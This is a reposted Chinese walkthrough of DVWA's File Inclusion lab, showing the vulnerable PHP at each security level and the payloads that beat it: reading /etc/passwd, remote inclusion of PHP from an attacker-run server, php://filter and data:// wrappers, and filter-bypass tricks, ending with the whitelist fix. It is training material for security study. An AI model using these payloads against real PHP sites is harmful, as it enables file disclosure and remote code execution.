DVWA靶场-File Inclusion 文件包含

其他 2020-10-29 10:15:21 阅读次数: 0

往期博文:

DVWA靶场-Brute Force Source 暴力破解

DVWA靶场-Command Injection 命令注入

DVWA靶场-CSRF 跨站请求伪造

靶场环境搭建

https://github.com/ethicalhack3r/DVWA

[网络安全学习篇附]:DVWA 靶场搭建

目录

 

File Inclusion

Low File Inclusion

核心代码

攻击方式

Medium File Inclusion

核心代码

本地文件包含

远程文件包含

High File Inclusion

核心代码

Impossible File Inclusion

核心代码

File Inclusion

Low File Inclusion

核心代码

<?php

// The page we wish to display

$file = $_GET[ 'page' ];

?>

这里直接get传参,包含文件,没有进行任何过滤

攻击方式

1、本地文件读取

在实战中,如果攻击linux操作系统,最常见的就是查看其passwd文件

?page=/etc/passwd

2、远程文件包含

?page=http://www.baidu.com/robots.txt

3、本地文件包含 Getshell

这里我们使用phpinfo 测试

首先需要借助我们的靶场的文件上传,去上传info 文件,我们可以直接后缀为txt文件,文件包含的强大之处就在于他会执行所包含文件中的php代码

#info.txt

<?php

phpinfo();

?>

?page=../../hackable/uploads/info.txt

4、远程文件包含 Getshell

这里我们本地搭建一台服务器,IP:192.168.1.184

?page=http://192.168.1.184/info.txt

5、伪协议

php:// 访问各个输入/输出流(I/O streams),在CTF中经常使用的是php://filter和php://input,php://filter用于读取源码,php://input用于执行php代码。

php://filter 文件读取

?page=php://filter/read=convert.base64-encode/resource=index.php

data://

?page=data:text/plain,<?php phpinfo();?>

 

Medium File Inclusion

核心代码

<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\"" ), "", $file );

?>

本地文件包含

代码中过滤了 ../ ..\

如果我们知道其绝对路径,直接包含绝对路径,就可绕过检测

?page=/etc/passwd

不知道的话,可以尝试使用双写嵌套绕过

?page=…/./…/./..././..././..././etc/passwd

被replace 函数过滤之后

?page=../../../../../etc/passwd

 

远程文件包含

代码中过滤了http:// https://

由于这里只过滤了小写,我们可以尝试大写绕过

?page=HTTP://www.baidu.com/robots.txt

同样,我们也可以尝试使用双写嵌套绕过

?page=hhttp://ttp://www.baidu.com/robots.txt

被replace 函数过滤之后

?page=http://www.baidu.com/robots.txt

 

High File Inclusion

核心代码

<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}

?>

这里要求$file 变量的开头必须是file

由此我们想到了file 文件协议

为了测试效果,我们在web 根目录下创建一个info.php 文件

?page=file:///C:\phpStudy\WWW\info.php

 

Impossible File Inclusion

核心代码

<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Only allow include.php or file{1..3}.php
if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}

?>

这里使用白名单过滤策略,只允许三个参数通过,也就是说提交的参数只能时 include.php file.php file2.php file3.php 这三个中的一个,彻底杜绝了文件包含漏洞

https://www.sqlsec.com/2020/05/dvwa.html#toc-heading-25

https://www.freebuf.com/articles/web/119150.html

猜你喜欢

转载自blog.csdn.net/weixin_43252204/article/details/106556742
今日推荐
TIOBE 5 月榜单:Fortran “复活”进入 Top 10
GCC 14.1 发布
面壁智能发布 Eurux-8x22B 开源大模型 —— 堪称「理科状元」
开源日报 | 谷歌扶持鸿蒙上位;开源Rabbit R1;Docker加持的安卓手机;微软的焦虑和野心;海尔电器把开放平台关了
中国码农的“35岁魔咒”
蘭雅 CorelDRAW 插件 2024.5.1 国际劳动节版,免费下载
Arc Browser for Windows 1.0 正式 GA
90后程序员开发视频搬运软件、不到一年获利超 700 万,结局很刑!
周排行
基本数据类型封装类比较 Java源码解读(一) 8种基本类型对应的封装类型
JS实现无缝滚动上
深入解析HashMap原理(基于JDK1.8)
mysql的连接池
关于.htc
linux下的ubuntu12.04图形界面
【数论】好推不好记的扩展欧几里德
设备树详解
cscope + tags 简单设置
xml学习
每日归档
更多
2024-05-09(35)
2024-05-08(42)
2024-05-07(14)
2024-05-06(40)
2024-05-05(0)
2024-05-04(7)
2024-05-03(19)
2024-05-02(0)
2024-05-01(4)
2024-04-30(1)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022